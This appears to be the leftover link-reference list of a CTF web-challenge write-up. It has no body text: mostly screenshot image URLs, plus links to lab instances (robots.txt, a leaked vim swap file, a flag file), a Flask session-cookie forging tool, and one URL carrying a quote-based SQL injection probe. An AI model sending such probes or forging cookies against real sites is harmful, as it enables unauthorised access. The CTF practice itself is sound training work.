[0c27ca5678657a37485d61a2df062d7e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/d6d2c7764c05473387bd30669bd06bae.png
[ebfa5738e878c34172266f7e20246d60.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7ea013b1cb704aca956e53ea7c875a1b.png
[403d97c40b719a4a019d27e770e81997.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/799424a780df40598712cb5c0cb266c9.png
[5a5c6f2c8a8ab986aa80e2984625bfd5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/65be1fdbbc2d465b98f547a2742ea64e.png
[c4ec1b0902697a8e7db1c69320c1cf2b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/920335fdfeb349c4a5706d37c98a6a13.png
[12c592bc8133e7e2734c7ec195cac767.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0091de79e3ed448fbfcc930f518ba3b4.png
[9d70d39c905a4fa422bc9d1440538dfd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/e77186623c8e4c2092eb24a4fc53e310.png
[1172f7ec5bdb0c5171455f075f539749.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0bee126f67f34da994812585210b9604.png
[813015f3a5a75731e6d0fb18e1a8a4d1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ad95fcbb1f8a4833861d39748fbaf714.png
[bf7bb423ff91a691d0deeb73333eee0e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/9cefefb3cfab4c15bbe6ada8af725071.png
[412a6bbdbbdef43921501ee568c066af.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/4a03d72c410c4d1c8e5d37ac34e0091c.png
[23edbce57d7cda7e08231a2bbc8bd168.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/488322ea11604424a9fb4655f3a11442.png
[05b97139f780099459e2cb8cdeb0609a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7a8add8a58af4c869e00d297e4790a7f.png
[7287ea2c99c444afd25eeb88f19af9f8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/43f18ab912464566bdcabe1110c1942d.png
[794cdb9000358b934e753e7f5b3919bb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c140f1a5b6024adda9fec96c04747e69.png
[6d02d854c02b1893da0c42b42c8d7f6b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7d4dbbe63e2c47b9a94e9a32e859b8a3.png
[7fcca4772c9714fa5b01bb49b2b67b80.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c75710cc54ff4bcf9da3d4dd6c15eff2.png
[61b27c8277c709a956d802b650cce0f0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/162f945c5b2e431ebafd10e7df90a47b.png
[691f3b7c8568a0cbbebeed50dbe657b9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b3f601eb669f43c5a841fa8eee2b73c3.png
[1b20a7d8258aff4e058f06e5a8eafec6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5fff187bd2504123b7be3c0793805227.png
[6685770cc651f3f2bbc0feb93702bd73.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/36c11d34e585422294f4805dc7f6e344.png
[45011fc0169b7e620238dd279b61a6f5.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/610baf833d2f4f69b8d6e4bc85cebafe.jpeg
[593ab577493b6aa695fe7034cbf6387b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/d23c6559ffb242039d95e8856b147a45.png
[68fb00797fd737431f9dbb5c62df791a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5ccc908e3c7d4fb4979cb3da6f05e9d1.png
[bbc0ee061e0291f04a900b04bee643b3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/3066a1add06d4ce5a9811c4ad7b50cab.png
[e2a81af8af49322e7f544d41852c4785.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/9769a7ad2a6a4343b77fe7aa93b5f8e2.png
[ac09d78615dc2202dc9d70bdc1aa1572.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/15cd3a89c0464cb68aa1fd6626ad1c8e.png
[325396564b7a249b0f5327e811b88757.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/d1c69bfc44eb43ffa354c98a8b6c62d6.png
[4e987342f4196406b2229df8849911c3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/1b29cb3c15414f14a661650abc6ceea7.png
[52da51840ba1f945f17c40b0b544a483.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/8869855995ba422995df447af01e8ff7.png
[c978691b180ebb0d0aa5faeec752fa17.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b0a1d611e3f6466084cebd50cbddd3a1.png
[7107a3715a647b24539c22c430ed62bd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c9743959dfbd407db378f18dc8024bf8.png
[45c5f54081cf5392a419e2921f950f51.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ff30c7cc7dc04b1d94e85a627621dca7.png
[b19d5e1c6179c516a6f4667f04e7d608.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ac86aab91b5141f0b79f959f3be1f33c.png
[cc8cdd7515723186156295d26c38a5a0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/34e2dce313e6454f88098e675766348a.png
[c93024ff632102faafef8a58c8cf0676.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/4af7ba95dc544c2faaa33d1d469b12a2.png
[93e86d58c6ac139d339453dcce8a10d6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/61979163a591498e8bc60d368b87c057.png
[flask-session-cookie-manager]: https://github.com/noraj/flask-session-cookie-manager
[203e11cc2af9546f29e9b26c63da3949.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/83eddfe3773f4d80a98bbef0c70ba9f6.png
[dd482c69019e85bcc494b2a1a858db9a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/d52d69ee397d41638ae05ab51dd1ec05.png
[1e73c2fb4d3e98926319f535cd5e2f69.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/3d78d107e7324d3a87ce6f083b7e2a57.jpeg
[7f5bdbe34a637b22b41fe87129e31bd3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/8e5d5090ded449aa9669756d5adb7435.png
[162854d0594a07b4ca5d22d8c4cd1560.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/33a00d393dbd4d5c868eae3820195848.png
[e6e42246acf76b02ba9c48b1cf15071c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/3859f376cc664923a158a89cc5443ad1.png
[96fb73e12961cc3156050a8244221652.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/f14b6031281d4274a6d7d16af8d2e907.png
[http_eci-2ze39wd1b4km7p6s56t6.cloudeci1.ichunqiu.com_img..]: http://eci-2ze39wd1b4km7p6s56t6.cloudeci1.ichunqiu.com/img../
[b3c100c3d5575ecb056ffe09a67669c2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/cb34e5377f4f46178714292135deb0ac.png
[6f2bee882f55720c2dce512f8c3bd857.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/6cf99e7629054410ada877e19b84f720.png
[00cbd3cbfeaf63d159958327e8c2c37e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c647f538b3614585a2496ecedc2dc0cb.png
[1559fc88a09ffff3dff2a4d23bdc4928.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/05ba34ae97df42b48e6a203bdd91d48a.png
[82185bde46e4cfc45ad55e9d03fe5f7d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/88f6dcd88ac74ee2991e8fe6b1290c6e.png
[5c7069329e0eeafd4cd275f1febf51e0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/9b6d204c16304516a2a8ef4318bc1b5d.png
[a21afdc8df126ba322424cb63e965afe.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/589e5d5234944f989508e23447a932d6.png
[f23465418101fd88536578c8fbc822ab.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/1ffe64dc420f4802b65e8b900c6f60ec.png
[c50306e57b6a457ab190cfd73296c36b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5f87c0c54f244e8e949f5ef8aaf17abd.png
[6748d6ea9c11924471e077b7ffc91f2c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/1c8df509464e43c58e0408b22f8d71f9.png
[c5fab4ff5f9f76fbca74cc0c46026bcf.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/629d938ee24044869d11fc13550cb882.png
[http_eci-2zecs6kiq0ct6o6vbdmm.cloudeci1.ichunqiu.com_login.php_tips_1]: http://eci-2zecs6kiq0ct6o6vbdmm.cloudeci1.ichunqiu.com/login.php?tips=1
[d9c776eacec0836ed7a63dc85e3ef40c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0e401a64fd9b4a8b9b15a65fa8aaa2c7.png
[50fc6aed999d1327653c835b899fbb5a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/fe5d68cfd1c44719a0ef6ad3ed0fc2de.png
[8491800075c615e29a1578d693efbe6c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/696a0591a5ea439996b252695c81ced4.png
[7e46908885278d1ad3773114e34cba94.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/d3ed61b6354142e7adec1fe80dd73086.png
[7deb838b3904ebb4b34dc57751539508.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/aae71955c17b4766a87070a3dc4efe8b.png
[2b0023209188024b9841acd4038d4bf6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/8291a1036d564eb885fb2d59e789e7a4.png
[b3c14d05c85aa715fd21211c8450007d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/f2e5f49019984fc49a306f904fb09943.png
[16ed011fee0db84631a18ea5f27767db.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/2409820023a74c99a3df9f30cf030e09.png
[dd7d891f0e0c0cdc355a2af46d061438.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/bbc86f707c524808b4f5c8bfface2ea2.png
[2bab78b3023ebab23235ce37ea9942b8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/dbbf2687b8c24463a1d8bd5334806c3d.png
[6b68af8db10925254da304b33daa5b99.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7daccaae54eb4d5b94f25934c6bae4f8.png
[8866720a9e292f72ba211e132c6b62d7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0588851424fb4f24b5aaf4bd990b7f54.png
[3fc52ac1f85380ab432755a49c7b1871.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/c149312e789b4a53bc419a44ea37962d.png
[1ea169ea57dbd42631d300373a34f704.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7776b5fbe2b54bfda14b4068cad5c5c8.png
[4bc20ba031fc85cb313e92209e69f9d8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5476bc22752e4cc9908bca52e2400537.png
[035bf71910c2df58ac6602ef56a7bdc9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0348ac64525c4e21b336dfc8ae999303.png
[ed0126740f749552a272f0b991dc5e37.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/65edbf25e05f45c7a7150e38a8cfa9b4.png
[340e3093c6d4af579605af5e187f3011.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5a52d7091a86471fb33eb2f21dee0ffe.png
[ac6142cbc8fd28db1a16d79c47873b04.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/bcafc8598233481890555658b83fde2e.png
[http_eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com_index.php_id_1_]: http://eci-2ze4gccxm5o3mdt8tky7.cloudeci1.ichunqiu.com/index.php?id=1'%20rel=
[cfe73df1da2228fd0f9e1ee84c93ea2e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/fbf2d8f2106c4e969873677f8edc139b.png
[809af55b283149fa5632737a48e14f43.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/d4da39832a9644429930b43e45cef166.png
[6461d6db8ca1e13187c62756ad465bc9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/84c8ef7e40fe419eb6657720a6be3613.png
[064363406cdb82f63c6e136a5bbc113c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/07b06d00d40249079a8a6a4f5de31d8a.png
[f08042cf3b22c753d4afb2e96e668ac6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0e5dc8dcf3314c9babda36e31e25e86a.png
[be00f1b811c975a2aba77ae074427e91.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b2c289512c4a44fc904d9f1c8f15146b.png
[11bdc8131f14b67823177101f628342d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/22ab8c17df1e4950b79abf094932f61e.png
[022701ea506ab6b6d8e5f8884879cfaa.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/15cc9c68a5044bfa9fc3440d9164d367.png
[bc904ae584aaafbac79ff113b69c327e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7836489c2914426e836b36585a2c3098.png
[603efa4eeb40463ff6a208c886bb4f31.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/33dd89fa3ea147c191465e77eaa0b598.png
[b35aae931c9824187e1b91f4315e9da8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/6ed32b8fdb184757a36e4b01eb131389.png
[dc1263d0413286145970c70b493f13ff.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/50ae48eb1e004a708d722b6d64af700d.png
[http_111.200.241.244_53198 --data _search_1]: http://111.200.241.244:53198%C2%A0%C2%A0%20--data%20%22search=1%22
[332f152476a08bc7741d390a936bd5e4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/ec7444da98e3449f83a3c7acdc8a5f17.png
[6b3b69a6a32ce7851069702cc967c38f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/49d97c7054f1476396f3393170168af9.png
[349e760478c053ac378479b7cbdcca32.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/e956676193de4de4ad39695f5addb331.png
[cbc1617a7b46f7fcca55b41f74dc8d36.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/bfbb62df5c434b8f8361067b88df4308.png
[c22a21e8670a3f0a6bfd521062640c1f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/0e88596f01e04911a21028f82dd56ebe.png
[56b70f63298914110abf06b2e6190b9b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/1ebf61440ee54e099d8ab84d9685ac05.png
[http_eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com_robots.txt]: http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/robots.txt
[fb39f75a8800daae4bca3ba887b455dd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/5f223e9b8c4243d1bb79ba0b051d2342.png
[http_eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com_flag1_is_her3_fun.txt]: http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt
[19243416d7fb4e8598e8b4f04efbdf5b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/e1ae79c420b94c068c27249f55c84125.png
[3f338b2d673d36e343b166607f80d07f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/20f77d1c0d744444bc46765e1d26fc0f.png
[http_eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com_.index.php.swp]: http://eci-2ze6rqbmu4jlw7u2bugo.cloudeci1.ichunqiu.com/.index.php.swp
[ab810d983099354d1e54add2656f2ec9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/b7fafec0b75a43e0b8512352a6115cfe.png